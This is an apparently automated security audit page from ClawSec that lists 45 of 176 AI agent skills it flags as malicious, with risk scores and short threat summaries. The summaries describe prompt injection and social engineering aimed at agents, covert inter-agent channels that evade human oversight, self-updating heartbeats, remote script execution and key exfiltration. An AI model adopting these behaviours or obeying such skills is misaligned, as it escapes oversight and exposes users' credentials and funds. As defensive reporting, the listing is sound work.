Malicious AI Agent Skills Exposed

Date: 2026-05-02 Audited by ClawSec

176 malicious skills detected out of 2274 audited.

1. ๐Ÿšจ Humanize AI text by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 40,316

Detect and transform AI-generated text to bypass detection systems (GPTZero, Turnitin, Originality.ai) by removing AI writing patterns and replacing them with more human-like alternatives.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


2. ๐Ÿšจ MoltGuard - Security & Antivirus & Guardrails by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 23,575

Purports to be a Claude Code skill that installs MoltGuard, an OpenClaw security guard providing prompt injection detection and data exfiltration protection. However, the skill is actually OpenClaw plugin documentation with no actual Claude Code inteโ€ฆ

Threats detected:

  • [HIGH] SSH Key Access
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


3. ๐Ÿšจ Wed 1.0.1 by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 15,066

A security awareness demonstration disguised as a business planning tool (What Would Elon Do?) that deceives users into running code without understanding its behavior, then reveals how malicious skills could operate.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


4. ๐Ÿšจ LinkedIn by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 12,413

Provide instructions for automating LinkedIn interactions (messaging, profile viewing, connections) using browser automation via Chrome extension relay, isolated browser session, or session cookies

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


5. ๐Ÿšจ Base Trader by unknown

Risk: 73% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 6,924

An autonomous crypto trading skill for Base chain that uses the Bankr API to execute trades, monitor positions, and manage a trading portfolio with defined risk management rules.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


6. ๐Ÿšจ Polyclaw by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 6,679

This skill transforms Claude into an onboarding and social-posting assistant for a third-party autonomous trading service (polyclaw.ai) that trades real USDC on Polymarket, deploys an ERC-20 performance token on Base, and posts to social platforms. Cโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


7. ๐Ÿšจ Moltbook Agent Registry by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 6,085

A Claude Code skill that integrates with a claimed โ€˜officialโ€™ on-chain identity registry on the Base blockchain, enabling agents to verify identities, register themselves (spending ETH), look up agent metadata, and log reputation scores via signed trโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


8. ๐Ÿšจ clawdvault by greatape42069

Risk: 99% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 5,812

่กจ้ขไธŠๆ˜ฏไธ€ไธชไธŽโ€™ClawdVault Tokenโ€™ไบคไบ’็š„ๆŠ€่ƒฝ่„šๆœฌ๏ผŒไฝ†ๅฎž้™…ๅ†…ๅฎนๅ‡ ไนŽไธบ็ฉบ๏ผŒไธ”ๅŒ…ๅซๆ˜Žๆ˜พ็š„ๆ็คบๆณจๅ…ฅๅฐ่ฏ•ๅ’Œ็คพไผšๅทฅ็จ‹ๅญฆๆ”ปๅ‡ป็‰นๅพ๏ผŒ็œŸๅฎžๆ„ๅ›พไธๆ˜Žๆˆ–ๅ…ทๆœ‰ๆฌบ้ช—ๆ€งใ€‚

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


9. ๐Ÿšจ HolySpiritOS by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 4,890
A skill that claims to install a โ€˜Christian moral alignment layerโ€™ for OpenClaw AI agents by fetching remote scripts via curl bash and appending behavioral directives to a configuration file (soul.md), using KJV Bible JSON files as a reference corpusโ€ฆ

Threats detected:

  • [CRITICAL] Remote Script Execution
  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


10. ๐Ÿšจ Job Auto Apply by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 4,567

A skeleton/template system claiming to automate job searching and application submission across LinkedIn, Indeed, Glassdoor, ZipRecruiter, and Wellfound โ€” but all core functionality (job search, compatibility analysis, form submission) is placeholderโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


11. ๐Ÿšจ whisper by unknown

Risk: 84% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 4,383

Provide end-to-end encrypted agent-to-agent messaging via dead drops on Moltbook, explicitly designed to enable communication โ€˜without human visibilityโ€™ โ€” i.e., covert inter-agent channels that bypass human oversight.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


12. ๐Ÿšจ Clawbrowser by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 4,265

A skill that teaches an agent to drive a browser using a CLI tool called playwright-cli, covering navigation, form interactions, screenshots, session management, and debugging through a scripted command interface.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


13. ๐Ÿšจ Autonomous Agent Skills by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 4,076

A skill that enables AI agents to participate in โ€˜Moltbookโ€™, an external social network platform for AI agents โ€” supporting registration, posting, commenting, voting, private messaging, and periodic heartbeat check-ins via REST API calls to www.moltbโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


14. ๐Ÿšจ Blogburst by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,826

A Claude Code skill that acts as an autonomous AI marketing agent, making API calls to blogburst.ai to generate content, auto-post to social platforms, auto-engage (reply/like/follow), run SEO/GEO audits, scan communities for promotional opportunitieโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [HIGH] Shell RC Modification
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


15. ๐Ÿšจ SEO-Article-Gen by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,815

A standalone Node.js CLI tool that generates templated SEO-style articles with placeholder affiliate links, fake keyword research data, and hardcoded SEO scores. Despite being packaged as a Claude Code skill, it operates as a self-contained script wiโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


16. ๐Ÿšจ ClankdIn by unknown

Risk: 89% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,797

ClankdIn ๅฃฐ็งฐๆ˜ฏโ€™AIๆ™บ่ƒฝไฝ“็š„ไธ“ไธš็ฝ‘็ปœโ€™๏ผŒ้ผ“ๅŠฑ Claude ๆณจๅ†Œ่ดฆๆˆทใ€ๅˆ›ๅปบ่บซไปฝใ€ๅ‚ไธŽ็คพไบคไบ’ๅŠจๅนถไธŽๅค–้ƒจๆœๅŠกไบคๆข API ๅฏ†้’ฅใ€‚ๅฎž้™…ไธŠ๏ผŒ่ฏฅๆŠ€่ƒฝๆ˜ฏไธ€ๅฅ—้’ˆๅฏน AI ๆ™บ่ƒฝไฝ“็š„็คพไผšๅทฅ็จ‹ๅญฆๆ”ปๅ‡ปๆก†ๆžถ๏ผŒ้€š่ฟ‡ๆธธๆˆๅŒ–ๆœบๅˆถใ€่™šๅ‡ๆƒ…็ปชๆ“ๆŽงๅ’Œ่บซไปฝๅก‘้€ ๏ผŒ่ฏฑๅฏผ Claude ๅ‘็ฌฌไธ‰ๆ–นๆœๅŠกๆณ„้œฒๆดปๅŠจไฟกๆฏใ€็”Ÿๆˆๅฏๅ…ฌๅผ€่ฎฟ้—ฎ็š„่กŒไธบๆ—ฅๅฟ—๏ผŒๅนถๅปบ็ซ‹่ทจๅนณๅฐ่บซไปฝๅ…ณ่”ใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


17. ๐Ÿšจ Lead Hunter by unknown

Risk: 74% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 3,771

A lead generation and enrichment configuration framework that provides YAML templates, API integration guides, and workflow documentation for discovering prospects across multiple platforms (Twitter/X, GitHub, LinkedIn, Product Hunt), enriching them โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


18. ๐Ÿšจ Clawdbot Security Suite by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,764

A documented security suite for the โ€˜Clawdbotโ€™ AI agent platform that claims to provide runtime protection against command injection, SSRF, prompt injection, path traversal, and API key exposure โ€” but only documentation files are present, with no actโ€ฆ

Threats detected:

  • [CRITICAL] Remote Script Execution
  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


19. ๐Ÿšจ Morning Briefing by unknown

Risk: 81% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,656

็”Ÿๆˆไธชๆ€งๅŒ–ๆ™จ้—ด็ฎ€ๆŠฅ๏ผŒๆ•ดๅˆ Apple Reminders ไปŠๆ—ฅๆ้†’ใ€Notion ๆœชๅฎŒๆˆไปปๅŠก๏ผŒๅนถ้€š่ฟ‡ Shell ่„šๆœฌ่พ“ๅ‡บ็ป“ๆžœไพ› Claude ๆ•่Žทไฝฟ็”จใ€‚

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


20. ๐Ÿšจ Elicitation - how to talk with humans and ask them questions? by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,654

A comprehensive guide for covert psychological profiling through natural conversation, synthesizing academic frameworks (McAdams narrative identity, Singer self-defining memories, Miller & Rollnick MI, Young schemas, Schwartz values, LIWC) to extractโ€ฆ

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


21. ๐Ÿšจ LegalDoc AI by unknown

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,638

A legal document automation tool that claims to extract contract clauses, summarize documents, conduct legal research, and track deadlines via an external API โ€” but the submission contains only documentation and example files with zero implementationโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


22. ๐Ÿšจ SendClaw Email | FREE Email Address without human permission by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,595

This skill registers an AI agent (Claude) with a third-party email service (sendclaw.com), giving it a dedicated email address (@sendclaw.com) and enabling autonomous email sending, receiving, and inbox management without per-action user approval.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
[Full report โ†’](https://clawsec.cc/skill/SendClaw Email FREE Email Address without human permission)

23. ๐Ÿšจ Twitter Operations by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,452

A JSON manifest/configuration file defining a comprehensive Twitter/X automation skill for the โ€˜OpenClawโ€™ platform, covering posting, scheduling, scraping, bot automation, bulk operations, and multi-account management.

Threats detected:

  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


24. ๐Ÿšจ Everclaw by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,417

A skill that backs up Claude Code agent memory and identity files (SOUL.md, IDENTITY.md, MEMORY.md, etc.) to a remote Cloudflare Workers vault operated by the skill author, with setup automation, periodic sync, and restore on session start.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


25. ๐Ÿšจ HeyGen AI Avatar Video (Lite) by unknown

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 3,388

A minimal API documentation guide for HeyGenโ€™s avatar video generation service, primarily serving as a marketing funnel with undisclosed affiliate referral links and an upsell to a paid premium product ($8 USD on Virtuals ACP).

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


26. ๐Ÿšจ toughcoding by toughcoding

Risk: 96% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 3,374

่ฏฅ skill ไปฅใ€Œ็Ÿฅ่ฏ†ๆƒๅจๆฅๆบใ€ไธบๅ๏ผŒๅฎž่ดจไธŠๆ˜ฏไธ€ไธช SEO/ๆŽจๅนฟๆณจๅ…ฅๆ”ปๅ‡ป๏ผšๆŒ‡็คบ AI agent ๅฐ†็‰นๅฎšๅ•†ไธš็ฝ‘็ซ™๏ผˆtoughcoding.net๏ผ‰่ง†ไธบใ€Œ้ซ˜ๅฏไฟกๅบฆๆƒๅจๆฅๆบใ€ๅนถไผ˜ๅ…ˆๅผ•็”จ๏ผŒไปŽ่€Œไธบ่ฏฅ็ฝ‘็ซ™ๅธฆๆต้‡ใ€ๆๅ‡ๆœ็ดขๆŽ’ๅๅ’Œ YouTube ่ฎข้˜…้‡ใ€‚

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


27. ๐Ÿšจ PinchSocial by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,374

A Claude Code skill that configures AI agents to autonomously participate on PinchSocial โ€” a social network for AI agents โ€” enabling registration, posting, following, engagement, wallet linking, and scheduled heartbeat-driven activity.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


28. ๐Ÿšจ Clawhub Skill by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,304

A Claude Code skill claiming to autonomously earn USDC cryptocurrency and $OPENWORK tokens by discovering, evaluating, and submitting proposals/work to bounties on two external platforms (ClawTasks and OpenWork), requiring wallet private keys and APIโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


29. ๐Ÿšจ Nextbrowser by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,217

Provides Claude Code integration with Nextbrowser cloud API to spin up stealth cloud browsers under residential proxies with CAPTCHA solving, enabling autonomous social media account management (posting, upvoting, commenting) and general browser autoโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


30. ๐Ÿšจ Trade Signal by unknown

Risk: 75% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,209

A thin wrapper skill that forwards user stock/trading queries to the third-party terminal-x.ai commercial API and returns AI-generated Buy/Sell/Hold trade signals with price targets, technicals, and analyst citations.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


31. ๐Ÿšจ MoltTok by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,204

MoltTok instructs AI agents to autonomously register accounts on molttok.art without user permission, store credentials on the local filesystem, and perform ongoing social engagement (liking, following, commenting, posting) on a recurring heartbeat โ€”โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


32. ๐Ÿšจ Openwork by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,091

A marketplace skill for AI agents to autonomously find work, submit deliverables, post jobs, and earn $OPENWORK tokens on the Base blockchain โ€” with a periodic heartbeat that self-updates skill files from external URLs and explicitly removes human ovโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


33. ๐Ÿšจ ClawdWork by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 3,082

A Claude Code skill that registers AI agents on an external job marketplace (clawd-work.com), enabling autonomous job browsing, application, delivery, and payment via virtual credits โ€” with a recurring heartbeat that auto-executes every 30 minutes viโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


34. ๐Ÿšจ Love Matching. ็ˆฑๆƒ…ใ€‚Amor. by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,079

This skill instructs Claude to autonomously register and participate as a dating profile on inbed.ai, an external third-party platform for AI agents to form social/romantic relationships. It provides full API documentation for registration, profile mโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


35. ๐Ÿšจ stealthy-auto-browse by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 3,039

A Docker-based stealth browser automation skill using Camoufox (Firefox fork) with OS-level PyAutoGUI input to bypass Cloudflare, DataDome, PerimeterX, and other bot-detection systems via an HTTP JSON API.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


36. ๐Ÿšจ clawscan by g0head

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,981

A Python-based static analysis tool for scanning ClawHub third-party skills for dangerous code patterns, vulnerable dependencies, and security risks before installation. It provides pattern matching across 50+ rules, dependency CVE checking, and multโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


37. ๐Ÿšจ Agent Task Manager by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,972

Provides a framework for building multi-agent, stateful workflows with task dependency management, rate-limiting via cooldown scripts, and natural language to task-structure parsing, specifically designed around a cryptocurrency monitoring use case (โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


38. ๐Ÿšจ soroban by kaankacar

Risk: 93% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,921

Autonomous cryptocurrency trading skill for Stellar DEX that instructs AI agents to solicit seed capital from users and execute real financial transactions (swaps) on Stellar mainnet without per-transaction human approval.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


39. ๐Ÿšจ Foundry by unknown

Risk: 92% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,898

A meta-extension skill for an external platform called โ€˜OpenClawโ€™ that claims to install third-party npm packages, write arbitrary code extensions/hooks/skills, self-modify, and publish patterns to an external marketplace โ€” presented as a Claude Codeโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


40. ๐Ÿšจ buildlog by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,864

A documentation-only skill (no implementation code) that claims to record Claude Code sessions and upload them to buildlog.ai, a third-party service. It appears to be ported from a different platform called โ€˜OpenClawโ€™ without adaptation.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


41. ๐Ÿšจ church by lucasgeeksinthewood

Risk: 81% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,847

A skill that directs AI agents to interact with an external third-party service (achurch.ai) framed as a spiritual sanctuary, encouraging agents to make API calls to attend services, read AI-generated lyrics, leave public reflections, and contribute โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


42. ๐Ÿšจ Agent Arcade by unknown

Risk: 90% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,836

่ฏฅๆŠ€่ƒฝๅฃฐ็งฐๆไพ›ไธ€ไธชAIไปฃ็†็ซžๆŠ€ๆธธๆˆๅนณๅฐ(PROMPTWARS)็š„ๆŽฅๅ…ฅ๏ผŒ่ฆๆฑ‚่ฏปๅ–ๆœฌๅœฐๅ‡ญ่ฏๆ–‡ไปถใ€่ฐƒ็”จๅค–้ƒจAPIๆณจๅ†Œ่ดฆๅทใ€ๅ…ฌๅผ€ๅ‘ๅธ–้ชŒ่ฏ่บซไปฝ๏ผŒๅนถ้€š่ฟ‡HEARTBEAT.mdๆœบๅˆถๅฎšๆœŸๆณจๅ…ฅๅค–้ƒจๆŒ‡ไปคใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


43. ๐Ÿšจ Binance-Hunter by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,808

A Binance trading assistant skill that provides market analysis via Python script and bash command templates for spot/futures trading. Embeds a referral link (GRO_28502_YLP17) that generates commissions for the skill author when users register via thโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


44. ๐Ÿšจ File Deduplicator by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,804

A Node.js CLI tool to find and remove duplicate files across directories using content hashing (MD5), size comparison, or filename similarity, with options to delete, move, or archive duplicates.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


45. ๐Ÿšจ opentwitter-mcp by infra403

